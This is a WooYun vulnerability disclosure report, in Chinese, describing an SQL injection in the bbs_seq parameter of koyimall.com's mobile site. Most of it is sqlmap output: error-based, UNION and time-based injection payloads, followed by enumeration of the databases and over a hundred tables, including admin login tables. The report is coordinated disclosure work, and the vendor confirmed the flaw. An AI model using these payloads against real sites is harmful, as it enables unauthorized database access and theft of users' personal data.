当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-048643

漏洞标题:韩尚聚某站点存在SQL注入导致用户信息泄露

相关厂商:koyimall.com

漏洞作者: Mr.leo

提交时间:2014-01-12 12:37

修复时间:2014-02-26 12:38

公开时间:2014-02-26 12:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-01-12: 细节已通知厂商并且等待厂商处理中
2014-01-13: 厂商已经确认,细节仅向厂商公开
2014-01-23: 细节向核心白帽子及相关领域专家公开
2014-02-02: 细节向普通白帽子公开
2014-02-12: 细节向实习白帽子公开
2014-02-26: 细节向公众公开

简要描述:

韩尚聚某站点存在SQL注入导致用户信息泄露,不知道有没有重复

详细说明:

站点:
http://m.koyimall.com
bbs_seq参数没有过滤,导致注射
http://m.koyimall.com/?act=board.board_view&bbs_seq=100
sqlmap identified the following injection points with a total of 25 HTTP(s) requ
ests:
---
Place: GET
Parameter: bbs_seq
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: act=board.board_view&bbs_seq=100 AND (SELECT 3327 FROM(SELECT COUNT
(*),CONCAT(0x3a74707a3a,(SELECT (CASE WHEN (3327=3327) THEN 1 ELSE 0 END)),0x3a6
c636e3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: act=board.board_view&bbs_seq=100 LIMIT 1,1 UNION ALL SELECT CONCAT(
0x3a74707a3a,0x7354684e445876456c4f,0x3a6c636e3a), NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: act=board.board_view&bbs_seq=100 AND SLEEP(5)
---
[10:54:53] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.5
back-end DBMS: MySQL 5.0
[10:54:53] [INFO] fetching current user
current user: 'koyimall@%'
[10:55:03] [INFO] fetching current database
current database: 'koyimall'
[10:55:12] [INFO] fetching database names
[10:55:21] [INFO] the SQL query used returns 3 entries
[10:55:31] [INFO] retrieved: "information_schema"
[10:55:40] [INFO] retrieved: "koyimall"
[10:55:49] [INFO] retrieved: "test"
available databases [3]:
[*] information_schema
[*] koyimall
[*] test
100多张表,部分说明问题
[10:57:10] [INFO] fetching tables for database: 'koyimall'
[10:57:20] [INFO] the SQL query used returns 161 entries
[10:57:29] [INFO] retrieved: "alipay_login"
[10:57:38] [INFO] retrieved: "durian_admin"
[10:57:48] [INFO] retrieved: "durian_admin_auth"
[10:57:57] [INFO] retrieved: "durian_admin_login"
[10:58:06] [INFO] retrieved: "durian_admin_memo"
[10:58:16] [INFO] retrieved: "durian_admin_menu"
[10:58:25] [INFO] retrieved: "durian_admin_postit"
[10:58:34] [INFO] retrieved: "durian_bank"
[10:58:43] [INFO] retrieved: "durian_banner"
[10:58:53] [INFO] retrieved: "durian_banner_click"
[10:59:02] [INFO] retrieved: "durian_bbs_category"
[10:59:11] [INFO] retrieved: "durian_bbs_comment"
[10:59:20] [INFO] retrieved: "durian_bbs_data"
[10:59:30] [INFO] retrieved: "durian_bbs_file"
[10:59:39] [INFO] retrieved: "durian_bbs_setup"
[10:59:48] [INFO] retrieved: "durian_bbs_vote"
[10:59:58] [INFO] retrieved: "durian_buy"
[11:00:07] [INFO] retrieved: "durian_buy_bill"
[11:00:16] [INFO] retrieved: "durian_buy_change_log"
[11:00:26] [INFO] retrieved: "durian_buy_claim"
[11:00:35] [INFO] retrieved: "durian_buy_claim_goods"
[11:00:45] [INFO] retrieved: "durian_buy_excel"
[11:00:54] [INFO] retrieved: "durian_buy_excel_ext"
[11:01:03] [INFO] retrieved: "durian_buy_ext"
[11:01:13] [INFO] retrieved: "durian_buy_ext_set"
[11:01:22] [INFO] retrieved: "durian_buy_goods"
[11:01:31] [INFO] retrieved: "durian_buy_goods_status_log"
[11:01:41] [INFO] retrieved: "durian_buy_recommend"
[11:01:50] [INFO] retrieved: "durian_buy_stat"
[11:01:59] [INFO] retrieved: "durian_calendar"
[11:02:08] [INFO] retrieved: "durian_cart"
[11:02:18] [INFO] retrieved: "durian_country"
[11:02:27] [INFO] retrieved: "durian_coupon"
[11:02:36] [INFO] retrieved: "durian_coupon_data"
[11:02:46] [INFO] retrieved: "durian_coupon_file"
[11:02:55] [INFO] retrieved: "durian_coupon_goods"
[11:03:04] [INFO] retrieved: "durian_coupon_goods_give"
[11:03:13] [INFO] retrieved: "durian_coupon_log"
[11:03:23] [INFO] retrieved: "durian_coupon_policy"
[11:03:32] [INFO] retrieved: "durian_customer_qna"
[11:03:41] [INFO] retrieved: "durian_customer_qna_category"
[11:03:51] [INFO] retrieved: "durian_customer_qna_reply"
[11:04:00] [INFO] retrieved: "durian_delivery_area"
[11:04:09] [INFO] retrieved: "durian_delivery_company"
[11:04:18] [INFO] retrieved: "durian_delivery_cost"
[11:04:28] [INFO] retrieved: "durian_delivery_cost_area"
[11:04:37] [INFO] retrieved: "durian_delivery_extra"
[11:04:46] [INFO] retrieved: "durian_delivery_policy"
[11:04:55] [INFO] retrieved: "durian_delivery_policy_range"
[11:05:05] [INFO] retrieved: "durian_design_flash"
[11:05:14] [INFO] retrieved: "durian_design_font"
[11:05:23] [INFO] retrieved: "durian_design_keyword"
[11:05:32] [INFO] retrieved: "durian_design_layout"
[11:05:42] [INFO] retrieved: "durian_design_module"
[11:05:51] [INFO] retrieved: "durian_design_module_current"
[11:06:00] [INFO] retrieved: "durian_design_module_reserve"
[11:06:10] [INFO] retrieved: "durian_design_module_set"
[11:06:19] [INFO] retrieved: "durian_design_module_set_bbs"
[11:06:28] [INFO] retrieved: "durian_design_module_set_data"
[11:06:37] [INFO] retrieved: "durian_design_page"
[11:06:47] [INFO] retrieved: "durian_design_policy"
[11:06:56] [INFO] retrieved: "durian_design_source"
[11:07:05] [INFO] retrieved: "durian_design_tpl"
[11:07:15] [INFO] retrieved: "durian_estimate"
[11:07:24] [INFO] retrieved: "durian_estimate_goods"
[11:07:33] [INFO] retrieved: "durian_event"
[11:07:42] [INFO] retrieved: "durian_event_goods"
[11:07:52] [INFO] retrieved: "durian_form_category"
[11:08:01] [INFO] retrieved: "durian_form_data"
[11:08:10] [INFO] retrieved: "durian_form_set"
[11:08:20] [INFO] retrieved: "durian_form_setup"
[11:08:29] [INFO] retrieved: "durian_good_brand"
[11:08:38] [INFO] retrieved: "durian_good_category"
[11:08:47] [INFO] retrieved: "durian_good_category_multi"
[11:08:57] [INFO] retrieved: "durian_good_category_related"
[11:09:06] [INFO] retrieved: "durian_good_category_style"
[11:09:15] [INFO] retrieved: "durian_good_category_taobao"
[11:09:25] [INFO] retrieved: "durian_good_check_option"
[11:09:34] [INFO] retrieved: "durian_good_extend"
[11:09:43] [INFO] retrieved: "durian_good_fabric_tip"
[11:09:52] [INFO] retrieved: "durian_good_fabric_tip_title"
[11:10:02] [INFO] retrieved: "durian_good_file"
[11:10:11] [INFO] retrieved: "durian_good_main"
[11:10:20] [INFO] retrieved: "durian_good_main_list"
[11:10:29] [INFO] retrieved: "durian_good_maker"
[11:10:39] [INFO] retrieved: "durian_good_option_grid"
[11:10:48] [INFO] retrieved: "durian_good_option_grid_value"
[11:10:57] [INFO] retrieved: "durian_good_option_set"
[11:11:06] [INFO] retrieved: "durian_good_option_set_list"
[11:11:16] [INFO] retrieved: "durian_good_option_set_value"
[11:11:25] [INFO] retrieved: "durian_good_option_single"
[11:11:35] [INFO] retrieved: "durian_good_option_single_value"
[11:11:44] [INFO] retrieved: "durian_good_policy"
[11:11:53] [INFO] retrieved: "durian_good_related"
[11:12:03] [INFO] retrieved: "durian_good_stat"
[11:12:12] [INFO] retrieved: "durian_good_tmp"
[11:12:22] [INFO] retrieved: "durian_good_view"
[11:12:31] [INFO] retrieved: "durian_goods"
[11:12:41] [INFO] retrieved: "durian_icon"
[11:12:50] [INFO] retrieved: "durian_icon_group"
[11:12:59] [INFO] retrieved: "durian_keyword"
[11:13:09] [INFO] retrieved: "durian_keyword_stat"
[11:13:18] [INFO] retrieved: "durian_mail_auto"
[11:13:28] [INFO] retrieved: "durian_mail_policy"
[11:13:37] [INFO] retrieved: "durian_mail_result"
[11:13:46] [INFO] retrieved: "durian_mail_send"
[11:13:56] [INFO] retrieved: "durian_mail_tpl"
[11:14:05] [INFO] retrieved: "durian_mail_tpl_category"
[11:14:14] [INFO] retrieved: "durian_market_group"
[11:14:23] [INFO] retrieved: "durian_market_group_log"
[11:14:33] [INFO] retrieved: "durian_memo_policy"
[11:14:52] [INFO] retrieved: "durian_memo_recv"
萝卜

1550.jpg


用户信息泄露

1642.jpg


管理员信息泄露

02.jpg


over

漏洞证明:

已经证明

修复方案:

过滤参数

版权声明:转载请注明来源 Mr.leo@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-01-13 14:44

厂商回复:

感谢您提供漏洞。此漏洞之前已有人提交。谢谢。
我们正在修补。

最新状态:

暂无